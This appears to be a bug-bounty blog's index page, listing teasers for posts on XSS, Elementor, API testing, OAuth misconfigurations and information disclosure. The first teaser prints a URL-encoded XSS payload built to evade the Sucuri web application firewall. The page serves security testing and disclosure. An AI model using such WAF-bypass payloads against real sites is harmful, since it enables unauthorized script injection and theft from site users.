
Muhammed Mubarak
@admin_Secone4all✓ VERIFIED ADMIN
Hacker
XSS Bypass Sucuri WAF
[XSS] %22%3E%3Ca%20%20fooooooooooooooooooohref%20h%22r%22+%22%22;%20fooooooooooooooooooohref%20data-=%22%22href=jAvAsCrIpT%3Aconfirm`1`%3ECLICK%3C/a%3E if You Still Blocked You Ca…
Read post →Sep 28, 2024Elementor < 3.5.6 - DOM Reflected Cross-Site Scripting
Description The plugin does not sanitize and escape user input appended to the DOM via malicious Lightbox settings, resulting in a DOM Cross-Site Scripting issue. Proof of Concept…
Read post →Sep 23, 2024API Testing Methodology
1. Information Gathering Start by gathering API details like documentation and authentication methods. Example Request: GET /api/v1/docs 2. Authentication Testing Check if the API…
Read post →Sep 20, 2024OAuth Misconfiguration Scenarios with HTTP Request/Response Examples
1. Insufficient Token Expiry Hacker's Steps: The hacker steals the victim’s access token through some means (e.g., XSS, phishing, session hijacking). After a long period, the hack…
Read post →Jun 24, 2024Converting Self XSS to Non-Self XSS for a $$$ Bounty
Overview: This report details how I upgraded the severity of a self XSS vulnerability to a non-self XSS via CSRF, changing its status from P5 to P3. Initial Discovery: Self XSS Id…
Read post →Jun 24, 2024Information Disclosure Leading to a $$$ Bounty in 30 Minutes
Overview: This report describes how I discovered an information disclosure vulnerability that earned me a bounty in just 30 minutes. Steps to Discovery: Collecting Subdomains: I b…
Read post →